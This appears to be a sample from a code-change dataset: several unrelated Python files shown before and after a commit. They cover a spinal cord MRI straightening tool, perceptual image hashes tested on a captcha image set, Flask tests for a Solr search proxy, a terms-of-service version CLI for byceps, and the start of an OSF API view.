temp_mean = [coord.value for coord in coordinates_centerline if coord.z == z]
if temp_mean:
mean_value = mean(temp_mean)
mean_coord.append(mean([[coord.x * coord.value / mean_value, coord.y * coord.value / mean_value] for coord in coordinates_centerline if coord.z == z], axis=0))
# compute error between the input data and the nurbs
from math import sqrt
x0 = file_centerline_straight.data.shape[0]/2.0
y0 = file_centerline_straight.data.shape[1]/2.0
count_mean = 0
for coord_z in mean_coord:
if not isnan(sum(coord_z)):
dist = ((x0-coord_z[0])*px)**2 + ((y0-coord_z[1])*py)**2
self.mse_straightening += dist
dist = sqrt(dist)
if dist > self.max_distance_straightening:
self.max_distance_straightening = dist
count_mean += 1
self.mse_straightening = sqrt(self.mse_straightening/float(count_mean))
except Exception as e:
sct.printv('WARNING: Exception during Straightening:', 1, 'warning')
print 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
os.chdir('..')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
sct.printv('\nGenerate output file (in current folder)...', verbose)
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz', 'warp_curve2straight.nii.gz', verbose) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz', 'warp_straight2curve.nii.gz', verbose) # warping field
if fname_output == '':
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', file_anat+'_straight'+ext_anat, verbose) # straightened anatomic
else:
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', fname_output, verbose) # straightened anatomic
# Remove temporary files
if remove_temp_files:
sct.printv('\nRemove temporary files...', verbose)
sct.run('rm -rf '+path_tmp, verbose)
sct.printv('\nDone!\n', verbose)
sct.printv('Maximum x-y error = '+str(round(self.max_distance_straightening,2))+' mm', verbose, 'bold')
sct.printv('Accuracy of straightening (MSE) = '+str(round(self.mse_straightening,2))+' mm', verbose, 'bold')
# display elapsed time
elapsed_time = time.time() - start_time
sct.printv('\nFinished! Elapsed time: '+str(int(round(elapsed_time)))+'s', verbose)
sct.printv('\nTo view results, type:', verbose)
sct.printv('fslview '+fname_straight+' &\n', verbose, 'info')
if __name__ == "__main__":
# Initialize parser
parser = Parser(__file__)
#Mandatory arguments
parser.usage.set_description("This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal cord was straightened.")
parser.add_option(name="-i",
type_value="image_nifti",
description="input image.",
mandatory=True,
example="t2.nii.gz")
parser.add_option(name="-c",
type_value="image_nifti",
description="centerline or segmentation.",
mandatory=True,
example="centerline.nii.gz")
parser.add_option(name="-p",
type_value="int",
description="amount of padding for generating labels.",
mandatory=False,
example="30",
default_value=30)
parser.add_option(name="-o",
type_value="file_output",
description="output file",
mandatory=False,
default_value='',
example="out.nii.gz")
parser.add_option(name="-x",
type_value="multiple_choice",
description="Final interpolation.",
mandatory=False,
example=["nn", "linear", "spline"],
default_value="spline")
parser.add_option(name="-r",
type_value="multiple_choice",
description="remove temporary files.",
mandatory=False,
example=['0', '1'],
default_value='1')
parser.add_option(name="-a",
type_value="multiple_choice",
description="Algorithm for curve fitting.",
mandatory=False,
example=["hanning", "nurbs"],
default_value="hanning")
parser.add_option(name="-f",
type_value="multiple_choice",
description="Crop option. 0: no crop, 1: crop around landmarks.",
mandatory=False,
example=['0', '1'],
default_value=1)
parser.add_option(name="-v",
type_value="multiple_choice",
description="Verbose. 0: nothing, 1: basic, 2: extended.",
mandatory=False,
example=['0', '1', '2'],
default_value=1)
parser.add_option(name="-params",
type_value=[[','], 'str'],
description="""Parameters for spinal cord straightening. Separate arguments with ",".\nuse_continuous_labels : 0,1. Default = False\nalgo_fitting: {hanning,nurbs} algorithm for curve fitting. Default=hanning\nbspline_meshsize: <int>x<int>x<int> size of mesh for B-Spline registration. Default=5x5x10\nbspline_numberOfLevels: <int> number of levels for BSpline interpolation. Default=3\nbspline_order: <int> Order of BSpline for interpolation. Default=2\nalgo_landmark_rigid {rigid,xy,translation,translation-xy,rotation,rotation-xy} constraints on landmark-based rigid pre-registration""",
mandatory=False,
example="algo_fitting=nurbs,bspline_meshsize=5x5x12,algo_landmark_rigid=xy")
parser.add_option(name="-cpu-nb",
type_value="int",
description="Number of CPU used for straightening. 0: no multiprocessing. If not provided, it uses all the available cores.",
mandatory=False,
example="8")
arguments = parser.parse(sys.argv[1:])
# assigning variables to arguments
input_filename = arguments["-i"]
centerline_file = arguments["-c"]
sc_straight = SpinalCordStraightener(input_filename, centerline_file)
# Handling optional arguments
if "-r" in arguments:
sc_straight.remove_temp_files = int(arguments["-r"])
if "-p" in arguments:
sc_straight.padding = int(arguments["-p"])
if "-x" in arguments:
sc_straight.interpolation_warp = str(arguments["-x"])
if "-o" in arguments:
sc_straight.output_filename = str(arguments["-o"])
if "-a" in arguments:
sc_straight.algo_fitting = str(arguments["-a"])
if "-f" in arguments:
sc_straight.crop = int(arguments["-f"])
if "-v" in arguments:
sc_straight.verbose = int(arguments["-v"])
if "-cpu-nb" in arguments:
sc_straight.cpu_number = int(arguments["-cpu-nb"])
if "-params" in arguments:
params_user = arguments['-params']
# update registration parameters
for param in params_user:
param_split = param.split('=')
if param_split[0] == 'algo_fitting':
sc_straight.algo_fitting = param_split[1]
elif param_split[0] == 'bspline_meshsize':
sc_straight.bspline_meshsize = param_split[1]
elif param_split[0] == 'bspline_numberOfLevels':
sc_straight.bspline_numberOfLevels = param_split[1]
elif param_split[0] == 'bspline_order':
sc_straight.bspline_order = param_split[1]
elif param_split[0] == 'algo_landmark_rigid':
sc_straight.algo_landmark_rigid = param_split[1]
elif param_split[0] == 'all_labels':
sc_straight.all_labels = int(param_split[1])
elif param_split[0] == 'use_continuous_labels':
sc_straight.use_continuous_labels = int(param_split[1])
elif param_split[0] == 'gapz':
sc_straight.gapz = int(param_split[1])
sc_straight.straighten()
|
# coding: utf-8
import pathlib
import cv2
import numpy as np
import scipy.fftpack
def avhash(im):
im = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC)
avg = im.mean()
im = im > avg
im = np.packbits(im)
return im
def phash(im):
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1)
im = im[:8, :8]
med = np.median(im)
im = im > med
im = np.packbits(im)
return im
def phash_simple(im):
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
im = scipy.fftpack.dct(im)
im = im[:8, 1:8 + 1]
avg = im.mean()
im = im > avg
im = np.packbits(im)
return im
def dhash(im):
im = cv2.resize(im, (8 + 1, 8), interpolation=cv2.INTER_CUBIC)
im = im[:, 1:] > im[:, :-1]
im = np.packbits(im)
return im
def dhash_vertical(im):
im = cv2.resize(im, (8, 8 + 1), interpolation=cv2.INTER_CUBIC)
im = im[1:, :] > im[:-1, :]
im = np.packbits(im)
return im
def whash(im):
pass
# 不是说我不做,我是真的看不懂其源码
def verify(_hash):
# 用验证集测试各哈希函数的效果
data = np.load('captcha.npz')
images, labels = data['images'], data['labels']
print(images.shape)
himages = {}
for idx, (img, label) in enumerate(zip(images, labels)):
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = _hash(img)
img.dtype = np.uint64
img = img[0]
if himages.get(img, (label,))[0] != label:
cv2.imwrite(f'errors/{idx}.{label}.jpg', images[idx])
pre_label, pre_idx = himages[img]
cv2.imwrite(f'errors/{idx}.{pre_label}.jpg', images[pre_idx])
else:
himages[img] = label, idx
print(len(himages))
if __name__ == '__main__':
pathlib.Path('errors').mkdir(exist_ok=True)
# verify(avhash)
# 我觉得下面这个是最佳的
verify(phash)
# verify(phash_simple)
# verify(dhash)
# verify(dhash_vertical)
whash确实挺不错的
# coding: utf-8
import pathlib
import cv2
import numpy as np
import scipy.fftpack
def avhash(im):
im = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC)
avg = im.mean()
im = im > avg
im = np.packbits(im)
return im
def phash(im):
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1)
im = im[:8, :8]
med = np.median(im)
im = im > med
im = np.packbits(im)
return im
def phash_simple(im):
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
im = scipy.fftpack.dct(im)
im = im[:8, 1:8 + 1]
avg = im.mean()
im = im > avg
im = np.packbits(im)
return im
def dhash(im):
im = cv2.resize(im, (8 + 1, 8), interpolation=cv2.INTER_CUBIC)
im = im[:, 1:] > im[:, :-1]
im = np.packbits(im)
return im
def dhash_vertical(im):
im = cv2.resize(im, (8, 8 + 1), interpolation=cv2.INTER_CUBIC)
im = im[1:, :] > im[:-1, :]
im = np.packbits(im)
return im
def whash(image):
"""
Wavelet Hash computation.
based on https://www.kaggle.com/c/avito-duplicate-ads-detection/
@image must be a PIL instance.
"""
ll_max_level = int(np.log2(min(image.shape)))
image_scale = 2**ll_max_level
level = 3
dwt_level = ll_max_level - level
image = cv2.resize(image, (image_scale, image_scale))
pixels = image / 255
# Remove low level frequency LL(max_ll) if @remove_max_haar_ll using haar filter
coeffs = pywt.wavedec2(pixels, 'haar', level = ll_max_level)
coeffs[0][:] = 0
pixels = pywt.waverec2(coeffs, 'haar')
# Use LL(K) as freq, where K is log2(@hash_size)
coeffs = pywt.wavedec2(pixels, 'haar', level = dwt_level)
dwt_low = coeffs[0]
# Substract median and compute hash
med = np.median(dwt_low)
diff = dwt_low > med
diff = np.packbits(diff)
return diff
def verify(_hash):
# 用验证集测试各哈希函数的效果
data = np.load('captcha.npz')
images, labels = data['images'], data['labels']
print(images.shape)
himages = {}
for idx, (img, label) in enumerate(zip(images, labels)):
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = _hash(img)
img.dtype = np.uint64
img = img[0]
if himages.get(img, (label,))[0] != label:
cv2.imwrite(f'errors/{idx}.{label}.jpg', images[idx])
pre_label, pre_idx = himages[img]
cv2.imwrite(f'errors/{idx}.{pre_label}.jpg', images[pre_idx])
else:
himages[img] = label, idx
print(len(himages))
if __name__ == '__main__':
pathlib.Path('errors').mkdir(exist_ok=True)
# verify(avhash)
# 我觉得下面这个是最佳的
verify(phash)
# verify(phash_simple)
# verify(dhash)
# verify(dhash_vertical)
|
import sys, os
PROJECT_HOME = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))
sys.path.append(PROJECT_HOME)
from flask.ext.testing import TestCase
from flask import url_for
import unittest
import httpretty
import json
import app
from werkzeug.security import gen_salt
from werkzeug.datastructures import MultiDict
from StringIO import StringIO
from ..mocks import MockSolrResponse
from views import SolrInterface
class TestSolrInterface(TestCase):
def create_app(self):
"""Start the wsgi application"""
a = app.create_app()
return a
def test_cleanup_solr_request(self):
"""
Simple test of the cleanup classmethod
"""
payload = {'fl': ['*,bibcode,title']}
cleaned = SolrInterface.cleanup_solr_request(payload)
self.assertNotIn('*', cleaned['fl'][0])
class TestWebservices(TestCase):
def create_app(self):
"""Start the wsgi application"""
_ = app.create_app()
return _
@httpretty.activate
def test_cookie_forwarding(self):
"""
Test that cookies get properly passed by the SolrInterface
"""
def request_callback(request, uri, headers):
return 200, headers, request.headers.get('cookie')
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER'),
body=request_callback,
)
with self.client as c:
cookie_value = gen_salt(200)
# This cookie should be forwarded
c.set_cookie(
'localhost',
self.app.config.get("SOLR_SERVICE_FORWARD_COOKIE_NAME"),
cookie_value
)
# This cookie should not be forwarded
c.set_cookie(
'localhost',
'cookie_name',
'cookie_value'
)
r = c.get(url_for('search'), query_string={'q': 'star'})
# One and only one cookie
self.assertEqual(len(r.data.split('=')), 2)
# This forwarded cookie should match the one we gave originally
rcookie_value = r.data.split('=')[1]
self.assertEqual(rcookie_value, cookie_value)
def test_disallowed_fields(self):
"""
disallowed fields should be absent from the solr response
"""
with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
fl = 'title,id,abstract,{}'.format(
','.join(self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS'])
)
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'fl': fl},
)
for doc in r.json['response']['docs']:
self.assertIn('title', doc)
self.assertIn('id', doc)
self.assertIn('abstract', doc)
for field in self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS']:
self.assertNotIn(field, doc)
def test_cleanup_params(self):
"""
Certain parameters have limits
"""
with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.snippets': 10},
)
self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.snippets': 14, 'hl.full.snippets': 10},
)
self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
self.assertEqual(r.json['responseHeader']['params']['hl.full.snippets'], ['4'])
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.fragsize': '0'},
)
self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['1'])
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.fragsize': '50'},
)
self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['50'])
def test_set_max_rows(self):
"""
solr should only return up to a default number of documents multiplied
by the user's ratelimit-level, if applicable
"""
with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
r = self.client.get(
url_for('search'),
query_string={'q': '*', 'rows': 10}
)
self.assertEqual(len(r.json['response']['docs']), 7)
self.app.config['SOLR_SERVICE_MAX_ROWS'] = 2
r = self.client.get(
url_for('search'),
query_string={'q': '*', 'rows': 10}
)
self.assertEqual(len(r.json['response']['docs']), 2)
r = self.client.get(
url_for('search'),
query_string={'q': '*', 'rows': 10},
headers={'X-Adsws-Ratelimit-Level': '10'}
)
self.assertEqual(len(r.json['response']['docs']), 7)
def test_search(self):
"""
Test the search endpoint
"""
with MockSolrResponse(self.app.config['SOLR_SERVICE_SEARCH_HANDLER']):
r = self.client.get(url_for('search'))
self.assertIn('responseHeader', r.json)
@httpretty.activate
def test_qtree(self):
"""
Test the qtree endpoint
"""
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_QTREE_HANDLER'),
content_type='application/json',
status=200,
body=r'''{
"qtree": "\n{\"name\":\"OPERATOR\", \"label\":\"DEFOP\", \"children\": [\n {\"name\":\"MODIFIER\", \"label\":\"MODIFIER\", \"children\": [\n {\"name\":\"TMODIFIER\", \"label\":\"TMODIFIER\", \"children\": [\n {\"name\":\"FIELD\", \"label\":\"FIELD\", \"children\": [\n {\"name\":\"QNORMAL\", \"label\":\"QNORMAL\", \"children\": [\n {\"name\":\"TERM_NORMAL\", \"input\":\"star\", \"start\":0, \"end\":3}]\n }]\n }]\n }]\n }]\n}",
"responseHeader": {
"status": 0,
"QTime": 6,
"params": {
"q": "star",
"wt": "json",
"fl": "id"
}
}
}'''
)
r = self.client.get(url_for('qtree'))
self.assertEqual(r.status_code, 200)
self.assertIn('qtree', r.json)
self.assertIn('name', json.loads(r.json['qtree']))
r = self.client.post(url_for('tvrh'))
self.assertStatus(r, 405)
@httpretty.activate
def test_tvrh(self):
"""
Test the tvrh endpoint
"""
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_TVRH_HANDLER'),
content_type='application/json',
status=200,
body="""
{
"responseHeader":{
"status":0,
"QTime":1,
"params":{
"fl":"title",
"indent":"on",
"start":"0",
"q":"*:*",
"tv":"true",
"tv.all":"true",
"tv.fl":"abstract",
"wt":"json",
"qt":"tvrh",
"rows":"1"}},
"response":{"numFound":10715572,"start":0,"docs":[
{
"title":["The Structure of Convection in the Planetary Boundary -"]}]
},
"termVectors":[
"uniqueKeyFieldName","id",
"374878",[
"uniqueKey","374878"]]}
"""
)
resp = self.client.get(url_for('tvrh'))
self.assertEqual(resp.status_code, 200)
self.assertIn('termVectors', resp.json)
@httpretty.activate
def test_bigquery(self):
"""
Test the bigquery endpoint
"""
def request_callback(request, uri, headers):
if 'q' not in request.querystring:
return 500, headers, "{'The query parameters were not passed properly'}"
return 200, \
headers, \
"The {0} response from {1}".format(
request.method, uri
)
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_BIGQUERY_HANDLER'),
body=request_callback)
bibcodes = 'bibcode\n1907AN....174...59.\n1908PA.....16..445.\n1989LNP...334..242S'
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data={
'q': '*:*',
'fl': 'bibcode',
'fq': '{!bitset}',
'file_field': (StringIO(bibcodes), 'big-query/csv')
}
)
self.assertEqual(resp.status_code, 200)
# Missing 'fq' parameter
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data={
'q': '*:*',
'fl': 'bibcode',
'file_field': (StringIO(bibcodes), 'big-query/csv'),
}
)
self.assertEqual(resp.status_code, 200)
self.assertTrue('bitset' in resp.data)
# 'fq' without bitset
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data={
'q': '*:*',
'fl': 'bibcode',
'fq': '{compression = true}',
'file_field': (StringIO(bibcodes), 'big-query/csv'),
}
)
self.assertEqual(resp.status_code, 200)
self.assertTrue('compression' in resp.data)
self.assertTrue('bitset' in resp.data)
# We only allow one content stream to be sent
data = MultiDict([
('q', '*:*'),
('fl', 'bibcode'),
('fq', '{!bitset}'),
('file_field', (StringIO(bibcodes), 'big-query/csv')),
('file_field', (StringIO(bibcodes), 'big-query/csv')),
])
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data=data
)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.json['error'],
'You can only pass one content stream.')
if __name__ == '__main__':
unittest.main()
Update test_solr.py
import sys, os
PROJECT_HOME = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))
sys.path.append(PROJECT_HOME)
from flask.ext.testing import TestCase
from flask import url_for
import unittest
import httpretty
import json
import app
from werkzeug.security import gen_salt
from werkzeug.datastructures import MultiDict
from StringIO import StringIO
from ..mocks import MockSolrResponse
from views import SolrInterface
class TestSolrInterface(TestCase):
def create_app(self):
"""Start the wsgi application"""
a = app.create_app()
return a
def test_cleanup_solr_request(self):
"""
Simple test of the cleanup classmethod
"""
payload = {'fl': ['*,bibcode,title']}
cleaned = SolrInterface.cleanup_solr_request(payload)
self.assertNotIn('*', cleaned['fl'])
class TestWebservices(TestCase):
def create_app(self):
"""Start the wsgi application"""
_ = app.create_app()
return _
@httpretty.activate
def test_cookie_forwarding(self):
"""
Test that cookies get properly passed by the SolrInterface
"""
def request_callback(request, uri, headers):
return 200, headers, request.headers.get('cookie')
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER'),
body=request_callback,
)
with self.client as c:
cookie_value = gen_salt(200)
# This cookie should be forwarded
c.set_cookie(
'localhost',
self.app.config.get("SOLR_SERVICE_FORWARD_COOKIE_NAME"),
cookie_value
)
# This cookie should not be forwarded
c.set_cookie(
'localhost',
'cookie_name',
'cookie_value'
)
r = c.get(url_for('search'), query_string={'q': 'star'})
# One and only one cookie
self.assertEqual(len(r.data.split('=')), 2)
# This forwarded cookie should match the one we gave originally
rcookie_value = r.data.split('=')[1]
self.assertEqual(rcookie_value, cookie_value)
def test_disallowed_fields(self):
"""
disallowed fields should be absent from the solr response
"""
with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
fl = 'title,id,abstract,{}'.format(
','.join(self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS'])
)
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'fl': fl},
)
for doc in r.json['response']['docs']:
self.assertIn('title', doc)
self.assertIn('id', doc)
self.assertIn('abstract', doc)
for field in self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS']:
self.assertNotIn(field, doc)
def test_cleanup_params(self):
"""
Certain parameters have limits
"""
with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.snippets': 10},
)
self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.snippets': 14, 'hl.full.snippets': 10},
)
self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
self.assertEqual(r.json['responseHeader']['params']['hl.full.snippets'], ['4'])
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.fragsize': '0'},
)
self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['1'])
r = self.client.get(
url_for('search'),
query_string={'q': 'star', 'hl.fragsize': '50'},
)
self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['50'])
def test_set_max_rows(self):
"""
solr should only return up to a default number of documents multiplied
by the user's ratelimit-level, if applicable
"""
with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
r = self.client.get(
url_for('search'),
query_string={'q': '*', 'rows': 10}
)
self.assertEqual(len(r.json['response']['docs']), 7)
self.app.config['SOLR_SERVICE_MAX_ROWS'] = 2
r = self.client.get(
url_for('search'),
query_string={'q': '*', 'rows': 10}
)
self.assertEqual(len(r.json['response']['docs']), 2)
r = self.client.get(
url_for('search'),
query_string={'q': '*', 'rows': 10},
headers={'X-Adsws-Ratelimit-Level': '10'}
)
self.assertEqual(len(r.json['response']['docs']), 7)
def test_search(self):
"""
Test the search endpoint
"""
with MockSolrResponse(self.app.config['SOLR_SERVICE_SEARCH_HANDLER']):
r = self.client.get(url_for('search'))
self.assertIn('responseHeader', r.json)
@httpretty.activate
def test_qtree(self):
"""
Test the qtree endpoint
"""
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_QTREE_HANDLER'),
content_type='application/json',
status=200,
body=r'''{
"qtree": "\n{\"name\":\"OPERATOR\", \"label\":\"DEFOP\", \"children\": [\n {\"name\":\"MODIFIER\", \"label\":\"MODIFIER\", \"children\": [\n {\"name\":\"TMODIFIER\", \"label\":\"TMODIFIER\", \"children\": [\n {\"name\":\"FIELD\", \"label\":\"FIELD\", \"children\": [\n {\"name\":\"QNORMAL\", \"label\":\"QNORMAL\", \"children\": [\n {\"name\":\"TERM_NORMAL\", \"input\":\"star\", \"start\":0, \"end\":3}]\n }]\n }]\n }]\n }]\n}",
"responseHeader": {
"status": 0,
"QTime": 6,
"params": {
"q": "star",
"wt": "json",
"fl": "id"
}
}
}'''
)
r = self.client.get(url_for('qtree'))
self.assertEqual(r.status_code, 200)
self.assertIn('qtree', r.json)
self.assertIn('name', json.loads(r.json['qtree']))
r = self.client.post(url_for('tvrh'))
self.assertStatus(r, 405)
@httpretty.activate
def test_tvrh(self):
"""
Test the tvrh endpoint
"""
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_TVRH_HANDLER'),
content_type='application/json',
status=200,
body="""
{
"responseHeader":{
"status":0,
"QTime":1,
"params":{
"fl":"title",
"indent":"on",
"start":"0",
"q":"*:*",
"tv":"true",
"tv.all":"true",
"tv.fl":"abstract",
"wt":"json",
"qt":"tvrh",
"rows":"1"}},
"response":{"numFound":10715572,"start":0,"docs":[
{
"title":["The Structure of Convection in the Planetary Boundary -"]}]
},
"termVectors":[
"uniqueKeyFieldName","id",
"374878",[
"uniqueKey","374878"]]}
"""
)
resp = self.client.get(url_for('tvrh'))
self.assertEqual(resp.status_code, 200)
self.assertIn('termVectors', resp.json)
@httpretty.activate
def test_bigquery(self):
"""
Test the bigquery endpoint
"""
def request_callback(request, uri, headers):
if 'q' not in request.querystring:
return 500, headers, "{'The query parameters were not passed properly'}"
return 200, \
headers, \
"The {0} response from {1}".format(
request.method, uri
)
httpretty.register_uri(
httpretty.POST, self.app.config.get('SOLR_SERVICE_BIGQUERY_HANDLER'),
body=request_callback)
bibcodes = 'bibcode\n1907AN....174...59.\n1908PA.....16..445.\n1989LNP...334..242S'
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data={
'q': '*:*',
'fl': 'bibcode',
'fq': '{!bitset}',
'file_field': (StringIO(bibcodes), 'big-query/csv')
}
)
self.assertEqual(resp.status_code, 200)
# Missing 'fq' parameter
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data={
'q': '*:*',
'fl': 'bibcode',
'file_field': (StringIO(bibcodes), 'big-query/csv'),
}
)
self.assertEqual(resp.status_code, 200)
self.assertTrue('bitset' in resp.data)
# 'fq' without bitset
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data={
'q': '*:*',
'fl': 'bibcode',
'fq': '{compression = true}',
'file_field': (StringIO(bibcodes), 'big-query/csv'),
}
)
self.assertEqual(resp.status_code, 200)
self.assertTrue('compression' in resp.data)
self.assertTrue('bitset' in resp.data)
# We only allow one content stream to be sent
data = MultiDict([
('q', '*:*'),
('fl', 'bibcode'),
('fq', '{!bitset}'),
('file_field', (StringIO(bibcodes), 'big-query/csv')),
('file_field', (StringIO(bibcodes), 'big-query/csv')),
])
resp = self.client.post(
url_for('bigquery'),
content_type='multipart/form-data',
data=data
)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.json['error'],
'You can only pass one content stream.')
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
"""Set the current version of the terms of service for a brand.
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from typing import Dict, List, Optional
import click
from pick import pick
from byceps.services.terms.models.version import Version
from byceps.services.terms.transfer.models import VersionID
from byceps.services.terms import version_service
from byceps.util.datetime.format import format_datetime_short
from byceps.util.system import get_config_filename_from_env_or_exit
from _util import app_context
from _validators import validate_brand
@click.command()
@click.argument('brand', callback=validate_brand)
def execute(brand):
versions = version_service.get_versions_for_brand(brand.id)
current_version_id = version_service.find_current_version_id(brand.id)
versions_by_id = {v.id: v for v in versions}
# Ask user which version to set as the current one.
selected_version_id = _request_version_id(versions_by_id,
current_version_id)
# Set current version.
version_service.set_current_version(brand.id, selected_version_id)
# Confirm update to user.
selected_version_title = versions_by_id[selected_version_id].title
click.secho(
'Current version for brand ID "{}" was set to "{}".'.format(
brand.id, selected_version_title),
fg='green')
def _request_version_id(versions_by_id: Dict[VersionID, Version],
current_version_id: Optional[VersionID]
) -> VersionID:
version_ids = _get_version_ids_latest_first(versions_by_id)
def get_option_title(version_id):
version = versions_by_id[version_id]
return '"{}"\t\t{}'.format(
version.title, format_datetime_short(version.created_at))
current_version_option_index = version_ids.index(current_version_id)
selection = pick(
version_ids,
title='Choose version to set as the current one:',
options_map_func=get_option_title,
default_index=current_version_option_index)
return selection[0]
def _get_version_ids_latest_first(versions_by_id: Dict[VersionID, Version]
) -> List[VersionID]:
versions = versions_by_id.values()
versions_latest_first = list(sorted(versions,
key=lambda v: v.created_at,
reverse=True))
return [v.id for v in versions_latest_first]
if __name__ == '__main__':
config_filename = get_config_filename_from_env_or_exit()
with app_context(config_filename):
execute()
Handle current terms version not being set
#!/usr/bin/env python
"""Set the current version of the terms of service for a brand.
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from typing import Dict, List, Optional
import click
from pick import pick
from byceps.services.terms.models.version import Version
from byceps.services.terms.transfer.models import VersionID
from byceps.services.terms import version_service
from byceps.util.datetime.format import format_datetime_short
from byceps.util.system import get_config_filename_from_env_or_exit
from _util import app_context
from _validators import validate_brand
@click.command()
@click.argument('brand', callback=validate_brand)
def execute(brand):
versions = version_service.get_versions_for_brand(brand.id)
current_version_id = version_service.find_current_version_id(brand.id)
versions_by_id = {v.id: v for v in versions}
# Ask user which version to set as the current one.
selected_version_id = _request_version_id(versions_by_id,
current_version_id)
# Set current version.
version_service.set_current_version(brand.id, selected_version_id)
# Confirm update to user.
selected_version_title = versions_by_id[selected_version_id].title
click.secho(
'Current version for brand ID "{}" was set to "{}".'.format(
brand.id, selected_version_title),
fg='green')
def _request_version_id(versions_by_id: Dict[VersionID, Version],
current_version_id: Optional[VersionID]
) -> VersionID:
version_ids = _get_version_ids_latest_first(versions_by_id)
def get_option_title(version_id):
version = versions_by_id[version_id]
return '"{}"\t\t{}'.format(
version.title, format_datetime_short(version.created_at))
if current_version_id is not None:
current_version_option_index = version_ids.index(current_version_id)
else:
current_version_option_index = 0
selection = pick(
version_ids,
title='Choose version to set as the current one:',
options_map_func=get_option_title,
default_index=current_version_option_index)
return selection[0]
def _get_version_ids_latest_first(versions_by_id: Dict[VersionID, Version]
) -> List[VersionID]:
versions = versions_by_id.values()
versions_latest_first = list(sorted(versions,
key=lambda v: v.created_at,
reverse=True))
return [v.id for v in versions_latest_first]
if __name__ == '__main__':
config_filename = get_config_filename_from_env_or_exit()
with app_context(config_filename):
execute()
|
from rest_framework import generics, permissions as drf_permissions
from rest_framework.exceptions import NotFound
from website.models import NodeLog
from framework.auth.oauth_scopes import CoreScopes
from api.base.filters import ODMFilterMixin
from api.base.utils import get_user_auth, get_object_or_error
from api.base import permissions as base_permissions
from api.nodes.serializers import NodeSerializer
from api.logs.serializers import NodeLogSerializer
from api.base.views import JSONAPIBaseView
class LogNodeList(JSONAPIBaseView, generics.ListAPIView, ODMFilterMixin):
"""List of nodes that a given log is associated with. *Read-only*.
Paginated list of nodes that the user contributes to. Each resource contains the full representation of the node,
meaning additional requests to an individual node's detail view are not necessary. If the user id in the path is the
same as the logged-in user, all nodes will be visible. Otherwise, you will only be able to see the other user's
publicly-visible nodes. The special user id `me` can be used to represent the currently logged-in user.
##Node Attributes
<!--- Copied Attributes from NodeDetail -->
